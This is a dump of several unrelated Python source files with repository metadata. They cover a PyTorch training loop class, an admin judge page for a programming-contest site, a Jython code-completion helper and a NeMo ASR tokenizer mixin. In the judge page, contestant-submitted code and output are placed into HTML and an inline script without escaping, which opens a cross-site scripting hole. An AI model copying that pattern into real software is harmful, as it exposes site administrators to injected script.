def __post_init__(self) -> None:
pass
def modify_model_pre_load(self) -> None:
pass
def set_model(self, spec: Do) -> None:
get_model = self._get_model[0]
if spec.post_load:
model = get_model(spec, self.model)
if model is not None:
self.model = model.to(device=self.device, dtype=self.dtype)
return
model = get_model(spec, None)
assert model is not None
self.model = model
self.modify_model_pre_load()
self.model = self.model.to(device=self.device, dtype=self.dtype)
def set_optimizer(self, spec: Do) -> None:
get_optimizer = self._get_optimizer[0]
optimizer = get_optimizer(spec, self.model)
if spec.post_load and (optimizer is None):
return
assert optimizer is not None
self.optimizer = optimizer
@abstractmethod
def step(self, spec: Do, item: Any, consts: Consts) -> Tuple[Tensor, Dict[str, float], bool]:
"""
Method that is called from train loop inside ``self.train`` per iteration.
It should return loss scalar to backpropagate (``loss.backward()``) and dict of other losses of interest.
        :return: loss to backpropagate (may be None when ``skip`` is True), dict of other losses, skip flag
"""
raise NotImplementedError
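    # Purely illustrative sketch of a concrete override (not part of the original API;
    # `criterion` is a hypothetical loss function):
    #
    #   def step(self, spec, item, consts):
    #       loss = criterion(self.model(item)) * consts.β
    #       return loss, {'loss': float(loss.item())}, False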
@abstractmethod
def print(self, epoch: int, iteration: int, spec: Do, item: Any, consts: Consts, losses: Dict[str, float]) -> None:
""" This function is called from ``self.train`` with ``with tr.no_grad():`` context
when ``self.print_every_epoch`` is satisfied. """
raise NotImplementedError
@abstractmethod
def save_model_output(self, spec: Do, epoch: int, run_id: str) -> None:
""" Method that is called with ``with tr.no_grad():`` context after successful model train.
It can be overridden to save needed results. """
raise NotImplementedError
@staticmethod
def all_lists(do: Do) -> Do:
kwargs: dict = asdict(do)
for k, v in kwargs.items():
if not (k in DO_EXCEPTIONS) and not isinstance(v, list):
kwargs[k] = [v]
# noinspection PyArgumentList
return type(do)(**kwargs)
def get_spec(self, do_id: int, i: int) -> Do:
do = self.do_specs[do_id]
kwargs: dict = asdict(do)
for k, v in kwargs.items():
if not (k in DO_EXCEPTIONS):
kwargs[k] = v[min(i, len(v) - 1)]
# noinspection PyArgumentList
spec = type(do)(**kwargs)
return spec
@staticmethod
def mean_losses(total_losses: Dict[str, float], batches: int) -> Dict[str, float]:
denominator = dict(_max=1, _min=1)
return {k: v / denominator.get(k[-4:], batches) for k, v in total_losses.items()}
def train_step(self, spec: Do, item: Any, consts: Consts) -> Tuple[Dict[str, float], bool]:
loss, losses_i, skip = self.step(spec=spec, item=item, consts=consts)
if skip:
return losses_i, skip
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
return losses_i, skip
def train(self, spec: Do, epoch_0: int, iteration_0: int) -> Tuple[int, int, Dict[str, float]]:
"""
If fresh model then ``iteration_0 == -1``.
:return: (epoch, iteration, save_dict)
"""
consts_iterators = spec.get_iterators()
iteration, printed_epoch = iteration_0, -1
losses: Dict[str, float]
epoch, losses, batches = epoch_0, dict(), 0 # for type checker
item_last_good: Any = None
for epoch in range(epoch_0 + 1, epoch_0 + 1 + spec.int_(spec.epochs)):
self.model.train()
losses, batches = dict(), 0
item: Any = None
get_loader = self._get_loader[0]
for item in get_loader(spec):
consts = consts_iterators.get_consts()
losses_i, skip = self.train_step(spec=spec, item=item, consts=consts)
if skip:
continue
for k, v in losses_i.items():
if k.endswith('_max'):
v0 = losses.get(k, -math.inf)
losses[k] = max(v0, v)
elif k.endswith('_min'):
v0 = losses.get(k, math.inf)
losses[k] = min(v0, v)
else:
v0 = losses.get(k, 0.)
losses[k] = v0 + v
batches += 1
iteration += 1
if iteration == iteration_0 + 1:
with tr.no_grad():
self.print(epoch=epoch, iteration=iteration, spec=spec, item=item, consts=consts,
losses=dict())
item_last_good = item
if item is None:
raise RuntimeError('Empty DataLoader')
if epoch % self.print_every_epoch == 0:
# noinspection PyUnboundLocalVariable
consts = consts
with tr.no_grad():
self.print(epoch=epoch, iteration=iteration, spec=spec, item=item_last_good, consts=consts,
losses=self.mean_losses(losses, batches))
printed_epoch = epoch
if epoch == epoch_0:
raise RuntimeError('No epochs')
# noinspection PyUnboundLocalVariable
consts = consts
if printed_epoch != epoch:
with tr.no_grad():
self.print(epoch=epoch, iteration=iteration, spec=spec, item=item_last_good, consts=consts,
losses=self.mean_losses(losses, batches))
self.last_consts = consts
return epoch, iteration, self.mean_losses(losses, batches)
def set_output_checker(self, output_checker: OutputChecker):
self.output_checker = output_checker
def tensor(self, x: Union[Array, Tensor], dtype: tr.dtype=None, device: tr.device=None,
requires_grad: bool=None, non_blocking: bool=None) -> Tensor:
"""
Uses default or doesn't change values except for ``dtype`` and ``device``
that use ``self.dtype`` and ``self.device`` as defaults.
"""
device = device if (device is not None) else self.device
dtype = dtype if (dtype is not None) else self.dtype
if isinstance(x, Tensor):
ret = x.to(device=device, dtype=dtype)
elif isinstance(x, Array):
ret = tr.tensor(x, dtype=dtype, device=device)
else:
raise TypeError
if non_blocking is not None:
ret = ret.to(non_blocking=non_blocking)
if requires_grad is not None:
ret.requires_grad = requires_grad
return ret
def load_model(self, spec: Do) -> None: # pylint: disable=unused-argument
"""
If you override this method you can more flexibly load the model.
Like changing ``self.model`` before or after loading.
* If ``optimizer_load_skip=('RESET',)`` kwarg is set then optimizer doesn't load.
* If ``optimizer_load_skip=`` kwarg is set to non empty str then optimizer merges loaded into defaults
(skipping empty string '' names).
* Same is for loading model.
>>> '''
>>> class Guide1(Guide):
>>> def load_model(self, spec: Do):
>>> # do something to the self.model before loading it
>>> super(Guide1, self).load_model(spec)
>>> # do something to the self.model after loading it:
>>> del self.model.qz_flow
>>> '''
"""
assert isinstance(spec.batch_size, int)
self.batch_size = spec.batch_size
checkpoint = self.logger.checkpoint()
spec.post_load = False
self.set_model(spec)
self.set_optimizer(spec)
self.epoch, self.iteration, self.log_stats = 0, -1, []
if path.isfile(checkpoint):
_checkpoint = tr.load(checkpoint)
model_state_dict_default = self.model.state_dict()
model_state_dict_loaded: Dict = _checkpoint['model_state_dict']
if spec.model_load_skip == ('RESET',):
model_state_dict_loaded = model_state_dict_default
elif spec.model_load_skip:
model_state_dict_upd = model_state_dict_loaded
for key in spec.model_load_skip:
if key != '':
del model_state_dict_upd[key]
model_state_dict_loaded = model_state_dict_default
model_state_dict_loaded.update(model_state_dict_upd)
optimizer_state_dict_default = self.optimizer.state_dict()
optimizer_state_dict_loaded: Dict = _checkpoint['optimizer_state_dict']
if spec.optimizer_load_skip == ('RESET',):
optimizer_state_dict_loaded = optimizer_state_dict_default
elif spec.optimizer_load_skip:
optimizer_state_dict_upd = optimizer_state_dict_loaded
for key in spec.optimizer_load_skip:
if key != '':
del optimizer_state_dict_upd[key]
optimizer_state_dict_loaded = optimizer_state_dict_default
optimizer_state_dict_loaded.update(optimizer_state_dict_upd)
self.model.load_state_dict(model_state_dict_loaded)
try:
self.optimizer.load_state_dict(optimizer_state_dict_loaded)
except ValueError:
self.optimizer.load_state_dict(optimizer_state_dict_default)
self.model.eval()
self.epoch = _checkpoint.get('epoch', self.epoch)
self.iteration = _checkpoint.get('iteration', self.iteration)
self.log_stats = _checkpoint.get('log_stats', self.log_stats)
if not (isinstance(self.log_stats, list)
and isinstance(self.epoch, int) and isinstance(self.iteration, int)):
raise RuntimeError('Loaded log_stats should be a list, epoch and iteration should be int.')
spec.post_load = True
self.set_model(spec)
self.set_optimizer(spec)
spec.post_load = False
# noinspection PyMethodMayBeStatic
def do_post_train(self, spec: Do) -> None:
pass
def run_guide(self):
for model_idx in self.models_idxs:
run_id = f'{self.id_pref}-{model_idx}'
for do_id in self.to_do:
do = self.do_specs[do_id]
double_break = False
for i in list(range(do.len))[do.start:do.end]:
spec = self.get_spec(do_id=do_id, i=i)
assert isinstance(spec.max_failure, int)
for _ in range(abs(int(spec.max_failure)) + 1):
self.logger.set_run_id(run_id)
self.load_model(spec=spec)
if self._train:
self.epoch, self.iteration, self._total_losses = self.train(
spec=spec, epoch_0=self.epoch, iteration_0=self.iteration)
self.do_post_train(spec=spec)
success = self.output_checker.check(guide=self)
if success:
save_dict = dict(
model_state_dict=self.model.state_dict(),
optimizer_state_dict=self.optimizer.state_dict(),
epoch=self.epoch,
iteration=self.iteration,
log_stats=self.log_stats,
do_spec=asdict(spec),
dtype=repr(self.dtype),
device=repr(self.device),
total_losses=self._total_losses,
glb_spec=self.glb_spec,
)
tr.save(save_dict, self.logger.checkpoint())
tr.save(save_dict, self.logger.checkpoint(epoch=self.epoch))
break
else:
break
else:
double_break = True
break
with tr.no_grad():
self.save_model_output(spec=spec, epoch=self.epoch, run_id=run_id)
if double_break:
break
else:
self.successful_models.append(model_idx)
if len(self.successful_models) >= self.successful_models_n:
break
def save(self):
do_id = self.to_do[-1]
do = self.do_specs[do_id]
spec = self.get_spec(do_id=do_id, i=list(range(do.len))[do.start:do.end][-1])
save_dict = dict(
model_state_dict=self.model.state_dict(),
optimizer_state_dict=self.optimizer.state_dict(),
epoch=self.epoch,
iteration=self.iteration,
log_stats=self.log_stats,
do_spec=asdict(spec),
dtype=repr(self.dtype),
device=repr(self.device),
total_losses=self._total_losses,
glb_spec=self.glb_spec,
)
self.logger.set_run_id(f'{self.id_pref}-{self.models_idxs[-1]}')
tr.save(save_dict, self.logger.checkpoint())
tr.save(save_dict, self.logger.checkpoint(epoch=self.epoch))
| 38.748188
| 119
| 0.574781
|
f34e76f77f83ef0b0586ee4ed3d19be9a20d4cd4
| 6,988
|
py
|
Python
|
src/main/generator/pages/judge.py
|
zrev2220/open-contest
|
5dbb383a19b8ff4dfe5bdcf18379cb8aa13b47b9
|
[
"Apache-2.0"
] | null | null | null |
src/main/generator/pages/judge.py
|
zrev2220/open-contest
|
5dbb383a19b8ff4dfe5bdcf18379cb8aa13b47b9
|
[
"Apache-2.0"
] | null | null | null |
src/main/generator/pages/judge.py
|
zrev2220/open-contest
|
5dbb383a19b8ff4dfe5bdcf18379cb8aa13b47b9
|
[
"Apache-2.0"
] | null | null | null |
from code.util import register
from code.util.db import Contest, Problem, Submission
from code.generator.lib.htmllib import *
from code.generator.lib.page import *
import logging
from datetime import datetime
class ProblemTab(UIElement):
def __init__(self, x):
num, prob = x
self.html = h.li(
h.a(prob.title, href=f"#tabs-{num}")
)
icons = {
"ok": "check",
"wrong_answer": "times",
"tle": "clock",
"runtime_error": "exclamation-triangle",
"presentation_error": "times",
"extra_output": "times",
"incomplete_output" : "times",
"reject" : "times",
"pending": "sync"
}
verdict_name = {
"ok": "Accepted",
"wrong_answer": "Wrong Answer",
"tle": "Time Limit Exceeded",
"runtime_error": "Runtime Error",
"presentation_error": "Presentation Error",
"extra_output": "Extra Output",
"incomplete_output": "Incomplete Output",
"reject": "Submission Rejected",
"pending": "Pending..."
}
def resultOptions(result):
ans = []
for res in verdict_name:
if result == res:
ans.append(h.option(verdict_name[res], value=res, selected="selected"))
else:
ans.append(h.option(verdict_name[res], value=res))
return ans
class TestCaseTab(UIElement):
def __init__(self, x, sub):
num, result = x
self.html = h.li(
h.a(href=f"#tabs-{sub.id}-{num}", contents=[
h.i(cls=f"fa fa-{icons[result]}", title=f"{verdict_name[result]}"),
f"Sample #{num}"
])
)
class TestCaseData(UIElement):
def __init__(self, x, sub):
num, input, output, error, answer = x
self.html = div(id=f"tabs-{sub.id}-{num}", contents=[
div(cls="row", contents=[
div(cls="col-12", contents=[
h.h4("Input"),
h.code(input.replace(" ", " ").replace("\n", "<br/>"))
])
]),
div(cls="row", contents=[
div(cls="col-6", contents=[
h.h4("Output"),
h.code(output.replace(" ", " ").replace("\n", "<br/>"))
]),
div(cls="col-6", contents=[
h.h4("Correct Answer"),
h.code(answer.replace(" ", " ").replace("\n", "<br/>"))
])
]),
div(cls="row", contents=[
div(cls="col-12", contents=[
h.h4("Diff"),
h.em("Insertions are in <span style=color:darkgreen;background-color:palegreen>green</span>, deletions are in <span style=color:darkred;background-color:#F6B0B0>red</span>"),
h.code(id=f"diff-{sub.id}-{num}", contents=[
h.script(f"document.getElementById('diff-{sub.id}-{num}').innerHTML = getDiff(`{output.rstrip()}`, `{answer.rstrip()}`)")
])
])
])
])
class SubmissionCard(UIElement):
def __init__(self, submission: Submission):
subTime = submission.timestamp
probName = submission.problem.title
cls = "red" if submission.result != "ok" else ""
self.html = div(cls="modal-content", contents=[
div(cls=f"modal-header {cls}", contents=[
h.h5(
f"Submission to {probName} at ",
h.span(subTime, cls="time-format")
),
"""
<button type="button" class="close" data-dismiss="modal" aria-label="Close">
<span aria-hidden="true">×</span>
</button>"""
]),
div(cls="modal-body", contents=[
h.strong("Language: <span class='language-format'>{}</span>".format(submission.language)),
h.br(),
h.strong("Result: ",
h.select(cls=f"result-choice {submission.id}", onchange=f"changeSubmissionResult('{submission.id}')", contents=[
*resultOptions(submission.result)
])
),
h.br(),
h.br(),
h.button("Rejudge", type="button", onclick=f"rejudge('{submission.id}')", cls="btn btn-primary rejudge"),
h.br(),
h.br(),
h.strong("Code:"),
h.code(submission.code.replace("\n", "<br/>").replace(" ", " "), cls="code"),
div(cls="result-tabs", id="result-tabs", contents=[
h.ul(*map(lambda x: TestCaseTab(x, submission), enumerate(submission.results))),
*map(lambda x: TestCaseData(x, submission), zip(range(submission.problem.tests), submission.inputs, submission.outputs, submission.errors, submission.answers))
])
])
])
class ProblemContent(UIElement):
def __init__(self, x, cont):
num, prob = x
subs = filter(lambda sub: sub.problem == prob and cont.start <= sub.timestamp <= cont.end, Submission.all())
self.html = div(*map(SubmissionCard, subs), id=f"tabs-{num}")
class SubmissionRow(UIElement):
def __init__(self, sub):
self.html = h.tr(
h.td(sub.user.username),
h.td(sub.problem.title),
h.td(cls='time-format', contents=sub.timestamp),
h.td(sub.language),
h.td(
h.i(" ", cls=f"fa fa-{icons[sub.result]}"),
h.span(verdict_name[sub.result])
),
onclick=f"submissionPopup('{sub.id}')"
)
class SubmissionTable(UIElement):
def __init__(self, contest):
subs = filter(lambda sub: sub.user.type != "admin" and contest.start <= sub.timestamp <= contest.end, Submission.all())
self.html = h.table(
h.thead(
h.tr(
h.th("Name"),
h.th("Problem"),
h.th("Time"),
h.th("Language"),
h.th("Result")
)
),
h.tbody(
*map(lambda sub: SubmissionRow(sub), subs)
),
id="submissions"
)
def judge(params, user):
cont = Contest.getCurrent()
if not cont:
return Page(
h1(" "),
h1("No Contest Available", cls="center")
)
return Page(
h2("Judge Submissions", cls="page-title"),
div(id="judge-table", contents=[
SubmissionTable(cont)
]),
div(cls="modal", tabindex="-1", role="dialog", contents=[
div(cls="modal-dialog", role="document", contents=[
div(id="modal-content")
])
])
)
def judge_submission(params, user):
return SubmissionCard(Submission.get(params[0]))
register.web("/judgeSubmission/([a-zA-Z0-9-]*)", "admin", judge_submission)
register.web("/judge", "admin", judge)
| 36.586387
| 194
| 0.509588
|
28d5f6b19c0c0980c14bc9a121923877bad18de9
| 17,224
|
py
|
Python
|
lib/debugger/VendorLib/vs-py-debugger/pythonFiles/experimental/ptvsd/ptvsd/_vendored/pydevd/_pydev_bundle/_pydev_jy_imports_tipper.py
|
barni2000/ide-python
|
605eada30ae32da6e43ab5f79f861bade79d797c
|
[
"MIT"
] | 349
|
2019-05-07T00:15:12.000Z
|
2022-03-10T15:05:08.000Z
|
lib/debugger/VendorLib/vs-py-debugger/pythonFiles/experimental/ptvsd/ptvsd/_vendored/pydevd/_pydev_bundle/_pydev_jy_imports_tipper.py
|
ichoake/ide-python
|
768c6bc1f0d9d8cd876f30c56921ac2f8d1caa2e
|
[
"MIT"
] | 1,095
|
2018-03-01T00:50:11.000Z
|
2019-05-06T17:44:15.000Z
|
lib/debugger/VendorLib/vs-py-debugger/pythonFiles/experimental/ptvsd/ptvsd/_vendored/pydevd/_pydev_bundle/_pydev_jy_imports_tipper.py
|
ichoake/ide-python
|
768c6bc1f0d9d8cd876f30c56921ac2f8d1caa2e
|
[
"MIT"
] | 53
|
2018-03-01T00:33:57.000Z
|
2019-05-05T00:50:23.000Z
|
try:
import StringIO
except:
import io as StringIO
import traceback
from java.lang import StringBuffer #@UnresolvedImport
from java.lang import String #@UnresolvedImport
import java.lang #@UnresolvedImport
import sys
from _pydev_bundle._pydev_tipper_common import do_find
from org.python.core import PyReflectedFunction #@UnresolvedImport
from org.python import core #@UnresolvedImport
from org.python.core import PyClass #@UnresolvedImport
try:
xrange
except:
xrange = range
#completion types.
TYPE_IMPORT = '0'
TYPE_CLASS = '1'
TYPE_FUNCTION = '2'
TYPE_ATTR = '3'
TYPE_BUILTIN = '4'
TYPE_PARAM = '5'
def _imp(name):
try:
return __import__(name)
except:
if '.' in name:
sub = name[0:name.rfind('.')]
return _imp(sub)
else:
s = 'Unable to import module: %s - sys.path: %s' % (str(name), sys.path)
raise RuntimeError(s)
import java.util
_java_rt_file = getattr(java.util, '__file__', None)
def Find(name):
f = None
if name.startswith('__builtin__'):
if name == '__builtin__.str':
name = 'org.python.core.PyString'
elif name == '__builtin__.dict':
name = 'org.python.core.PyDictionary'
mod = _imp(name)
parent = mod
foundAs = ''
if hasattr(mod, '__file__'):
f = mod.__file__
components = name.split('.')
old_comp = None
for comp in components[1:]:
try:
#this happens in the following case:
#we have mx.DateTime.mxDateTime.mxDateTime.pyd
            #but after importing it, mx.DateTime.mxDateTime shadows access to mxDateTime.pyd
mod = getattr(mod, comp)
except AttributeError:
if old_comp != comp:
raise
if hasattr(mod, '__file__'):
f = mod.__file__
else:
if len(foundAs) > 0:
foundAs = foundAs + '.'
foundAs = foundAs + comp
old_comp = comp
if f is None and name.startswith('java.lang'):
# Hack: java.lang.__file__ is None on Jython 2.7 (whereas it pointed to rt.jar on Jython 2.5).
f = _java_rt_file
if f is not None:
if f.endswith('.pyc'):
f = f[:-1]
elif f.endswith('$py.class'):
f = f[:-len('$py.class')] + '.py'
return f, mod, parent, foundAs
def format_param_class_name(paramClassName):
if paramClassName.startswith('<type \'') and paramClassName.endswith('\'>'):
paramClassName = paramClassName[len('<type \''): -2]
if paramClassName.startswith('['):
if paramClassName == '[C':
paramClassName = 'char[]'
elif paramClassName == '[B':
paramClassName = 'byte[]'
elif paramClassName == '[I':
paramClassName = 'int[]'
elif paramClassName.startswith('[L') and paramClassName.endswith(';'):
paramClassName = paramClassName[2:-1]
paramClassName += '[]'
return paramClassName
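# For reference, the branches above map JVM type descriptors to readable names, e.g.
# '[C' -> 'char[]', '[B' -> 'byte[]', '[I' -> 'int[]', '[Ljava.lang.String;' -> 'java.lang.String[]';
# anything else is returned unchanged (after stripping a surrounding "<type '...'>").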
def generate_tip(data, log=None):
data = data.replace('\n', '')
if data.endswith('.'):
data = data.rstrip('.')
f, mod, parent, foundAs = Find(data)
tips = generate_imports_tip_for_module(mod)
return f, tips
#=======================================================================================================================
# Info
#=======================================================================================================================
class Info:
def __init__(self, name, **kwargs):
self.name = name
self.doc = kwargs.get('doc', None)
self.args = kwargs.get('args', ()) #tuple of strings
self.varargs = kwargs.get('varargs', None) #string
self.kwargs = kwargs.get('kwargs', None) #string
self.ret = kwargs.get('ret', None) #string
def basic_as_str(self):
'''@returns this class information as a string (just basic format)
'''
args = self.args
if sys.version_info[0] <= 2:
            # Suppress the u''
args = [arg.encode('utf-8') if isinstance(arg, unicode) else arg for arg in args]
s = 'function:%s args=%s, varargs=%s, kwargs=%s, docs:%s' % \
(self.name, args, self.varargs, self.kwargs, self.doc)
return s
def get_as_doc(self):
s = str(self.name)
if self.doc:
s += '\n@doc %s\n' % str(self.doc)
if self.args:
s += '\n@params '
for arg in self.args:
s += str(format_param_class_name(arg))
s += ' '
if self.varargs:
s += '\n@varargs '
s += str(self.varargs)
if self.kwargs:
s += '\n@kwargs '
s += str(self.kwargs)
if self.ret:
s += '\n@return '
s += str(format_param_class_name(str(self.ret)))
return str(s)
def isclass(cls):
return isinstance(cls, core.PyClass) or type(cls) == java.lang.Class
def ismethod(func):
'''this function should return the information gathered on a function
@param func: this is the function we want to get info on
@return a tuple where:
0 = indicates whether the parameter passed is a method or not
1 = a list of classes 'Info', with the info gathered from the function
this is a list because when we have methods from java with the same name and different signatures,
we actually have many methods, each with its own set of arguments
'''
try:
if isinstance(func, core.PyFunction):
#ok, this is from python, created by jython
#print_ ' PyFunction'
def getargs(func_code):
"""Get information about the arguments accepted by a code object.
Three things are returned: (args, varargs, varkw), where 'args' is
a list of argument names (possibly containing nested lists), and
'varargs' and 'varkw' are the names of the * and ** arguments or None."""
nargs = func_code.co_argcount
names = func_code.co_varnames
args = list(names[:nargs])
step = 0
if not hasattr(func_code, 'CO_VARARGS'):
from org.python.core import CodeFlag # @UnresolvedImport
co_varargs_flag = CodeFlag.CO_VARARGS.flag
co_varkeywords_flag = CodeFlag.CO_VARKEYWORDS.flag
else:
co_varargs_flag = func_code.CO_VARARGS
co_varkeywords_flag = func_code.CO_VARKEYWORDS
varargs = None
if func_code.co_flags & co_varargs_flag:
varargs = func_code.co_varnames[nargs]
nargs = nargs + 1
varkw = None
if func_code.co_flags & co_varkeywords_flag:
varkw = func_code.co_varnames[nargs]
return args, varargs, varkw
args = getargs(func.func_code)
return 1, [Info(func.func_name, args=args[0], varargs=args[1], kwargs=args[2], doc=func.func_doc)]
if isinstance(func, core.PyMethod):
#this is something from java itself, and jython just wrapped it...
#things to play in func:
#['__call__', '__class__', '__cmp__', '__delattr__', '__dir__', '__doc__', '__findattr__', '__name__', '_doget', 'im_class',
#'im_func', 'im_self', 'toString']
#print_ ' PyMethod'
#that's the PyReflectedFunction... keep going to get it
func = func.im_func
if isinstance(func, PyReflectedFunction):
#this is something from java itself, and jython just wrapped it...
#print_ ' PyReflectedFunction'
infos = []
for i in xrange(len(func.argslist)):
#things to play in func.argslist[i]:
#'PyArgsCall', 'PyArgsKeywordsCall', 'REPLACE', 'StandardCall', 'args', 'compare', 'compareTo', 'data', 'declaringClass'
#'flags', 'isStatic', 'matches', 'precedence']
#print_ ' ', func.argslist[i].data.__class__
#func.argslist[i].data.__class__ == java.lang.reflect.Method
if func.argslist[i]:
met = func.argslist[i].data
name = met.getName()
try:
ret = met.getReturnType()
except AttributeError:
ret = ''
parameterTypes = met.getParameterTypes()
args = []
for j in xrange(len(parameterTypes)):
paramTypesClass = parameterTypes[j]
try:
try:
paramClassName = paramTypesClass.getName()
except:
paramClassName = paramTypesClass.getName(paramTypesClass)
except AttributeError:
try:
paramClassName = repr(paramTypesClass) #should be something like <type 'object'>
paramClassName = paramClassName.split('\'')[1]
except:
paramClassName = repr(paramTypesClass) #just in case something else happens... it will at least be visible
                        #if the parameter equals [C, it means it is a char array, so let's change it
a = format_param_class_name(paramClassName)
#a = a.replace('[]','Array')
#a = a.replace('Object', 'obj')
#a = a.replace('String', 's')
#a = a.replace('Integer', 'i')
#a = a.replace('Char', 'c')
#a = a.replace('Double', 'd')
args.append(a) #so we don't leave invalid code
info = Info(name, args=args, ret=ret)
#print_ info.basic_as_str()
infos.append(info)
return 1, infos
except Exception:
s = StringIO.StringIO()
traceback.print_exc(file=s)
return 1, [Info(str('ERROR'), doc=s.getvalue())]
return 0, None
def ismodule(mod):
#java modules... do we have other way to know that?
if not hasattr(mod, 'getClass') and not hasattr(mod, '__class__') \
and hasattr(mod, '__name__'):
return 1
return isinstance(mod, core.PyModule)
def dir_obj(obj):
ret = []
found = java.util.HashMap()
original = obj
if hasattr(obj, '__class__'):
if obj.__class__ == java.lang.Class:
#get info about superclasses
classes = []
classes.append(obj)
try:
c = obj.getSuperclass()
except TypeError:
#may happen on jython when getting the java.lang.Class class
c = obj.getSuperclass(obj)
while c != None:
classes.append(c)
c = c.getSuperclass()
#get info about interfaces
interfs = []
for obj in classes:
try:
interfs.extend(obj.getInterfaces())
except TypeError:
interfs.extend(obj.getInterfaces(obj))
classes.extend(interfs)
#now is the time when we actually get info on the declared methods and fields
for obj in classes:
try:
declaredMethods = obj.getDeclaredMethods()
except TypeError:
declaredMethods = obj.getDeclaredMethods(obj)
try:
declaredFields = obj.getDeclaredFields()
except TypeError:
declaredFields = obj.getDeclaredFields(obj)
for i in xrange(len(declaredMethods)):
name = declaredMethods[i].getName()
ret.append(name)
found.put(name, 1)
for i in xrange(len(declaredFields)):
name = declaredFields[i].getName()
ret.append(name)
found.put(name, 1)
elif isclass(obj.__class__):
d = dir(obj.__class__)
for name in d:
ret.append(name)
found.put(name, 1)
#this simple dir does not always get all the info, that's why we have the part before
#(e.g.: if we do a dir on String, some methods that are from other interfaces such as
#charAt don't appear)
d = dir(original)
for name in d:
if found.get(name) != 1:
ret.append(name)
return ret
def format_arg(arg):
'''formats an argument to be shown
'''
s = str(arg)
dot = s.rfind('.')
if dot >= 0:
s = s[dot + 1:]
s = s.replace(';', '')
s = s.replace('[]', 'Array')
if len(s) > 0:
c = s[0].lower()
s = c + s[1:]
return s
def search_definition(data):
'''@return file, line, col
'''
data = data.replace('\n', '')
if data.endswith('.'):
data = data.rstrip('.')
f, mod, parent, foundAs = Find(data)
try:
return do_find(f, mod), foundAs
except:
return do_find(f, parent), foundAs
def generate_imports_tip_for_module(obj_to_complete, dir_comps=None, getattr=getattr, filter=lambda name:True):
'''
@param obj_to_complete: the object from where we should get the completions
@param dir_comps: if passed, we should not 'dir' the object and should just iterate those passed as a parameter
@param getattr: the way to get a given object from the obj_to_complete (used for the completer)
@param filter: a callable that receives the name and decides if it should be appended or not to the results
@return: list of tuples, so that each tuple represents a completion with:
name, doc, args, type (from the TYPE_* constants)
'''
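    # Illustrative shape of one returned entry (values are hypothetical):
    #   ('charAt', '<doc text produced by Info.get_as_doc()>', '(int)', TYPE_FUNCTION)
    # i.e. (completion name, doc, formatted argument list, TYPE_* constant).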
ret = []
if dir_comps is None:
dir_comps = dir_obj(obj_to_complete)
for d in dir_comps:
if d is None:
continue
if not filter(d):
continue
args = ''
doc = ''
retType = TYPE_BUILTIN
try:
obj = getattr(obj_to_complete, d)
except (AttributeError, java.lang.NoClassDefFoundError):
#jython has a bug in its custom classloader that prevents some things from working correctly, so, let's see if
#we can fix that... (maybe fixing it in jython itself would be a better idea, as this is clearly a bug)
#for that we need a custom classloader... we have references from it in the below places:
#
#http://mindprod.com/jgloss/classloader.html
#http://www.javaworld.com/javaworld/jw-03-2000/jw-03-classload-p2.html
#http://freshmeat.net/articles/view/1643/
#
#note: this only happens when we add things to the sys.path at runtime, if they are added to the classpath
#before the run, everything goes fine.
#
            #The code below illustrates what I mean...
#
#import sys
#sys.path.insert(1, r"C:\bin\eclipse310\plugins\org.junit_3.8.1\junit.jar" )
#
#import junit.framework
#print_ dir(junit.framework) #shows the TestCase class here
#
#import junit.framework.TestCase
#
#raises the error:
#Traceback (innermost last):
# File "<console>", line 1, in ?
#ImportError: No module named TestCase
#
#whereas if we had added the jar to the classpath before, everything would be fine by now...
ret.append((d, '', '', retType))
#that's ok, private things cannot be gotten...
continue
else:
isMet = ismethod(obj)
if isMet[0] and isMet[1]:
info = isMet[1][0]
try:
args, vargs, kwargs = info.args, info.varargs, info.kwargs
doc = info.get_as_doc()
r = ''
for a in (args):
if len(r) > 0:
r += ', '
r += format_arg(a)
args = '(%s)' % (r)
except TypeError:
traceback.print_exc()
args = '()'
retType = TYPE_FUNCTION
elif isclass(obj):
retType = TYPE_CLASS
elif ismodule(obj):
retType = TYPE_IMPORT
#add token and doc to return - assure only strings.
ret.append((d, doc, args, retType))
return ret
if __name__ == "__main__":
sys.path.append(r'D:\dev_programs\eclipse_3\310\eclipse\plugins\org.junit_3.8.1\junit.jar')
sys.stdout.write('%s\n' % Find('junit.framework.TestCase'))
| 34.106931
| 138
| 0.532687
|
76ee2cabd73b52e0cad58ba9261323747286a306
| 5,334
|
py
|
Python
|
nemo/collections/asr/parts/mixins.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | 1
|
2021-06-19T19:27:19.000Z
|
2021-06-19T19:27:19.000Z
|
nemo/collections/asr/parts/mixins.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
nemo/collections/asr/parts/mixins.py
|
vadam5/NeMo
|
3c5db09539293c3c19a6bb7437011f91261119af
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC, abstractmethod
from typing import List
from omegaconf import DictConfig, OmegaConf
from nemo.collections.common import tokenizers
from nemo.utils import logging
class ASRBPEMixin(ABC):
""" ASR BPE Mixin class that sets up a Tokenizer via a config
This mixin class adds the method `_setup_tokenizer(...)`, which can be used by ASR models
which depend on subword tokenization.
The setup_tokenizer method adds the following parameters to the class -
- tokenizer_cfg: The resolved config supplied to the tokenizer (with `dir` and `type` arguments).
- tokenizer_dir: The directory path to the tokenizer vocabulary + additional metadata.
- tokenizer_type: The type of the tokenizer. Currently supports `bpe` and `wpe`.
- vocab_path: Resolved path to the vocabulary text file.
In addition to these variables, the method will also instantiate and preserve a tokenizer
(subclass of TokenizerSpec) if successful, and assign it to self.tokenizer.
"""
def _setup_tokenizer(self, tokenizer_cfg: DictConfig):
# Prevent tokenizer parallelism (unless user has explicitly set it)
if 'TOKENIZERS_PARALLELISM' not in os.environ:
os.environ['TOKENIZERS_PARALLELISM'] = 'false'
self.tokenizer_cfg = OmegaConf.to_container(tokenizer_cfg, resolve=True) # type: dict
self.tokenizer_dir = self.tokenizer_cfg.pop('dir') # Remove tokenizer directory
self.tokenizer_type = self.tokenizer_cfg.pop('type').lower() # Remove tokenizer_type
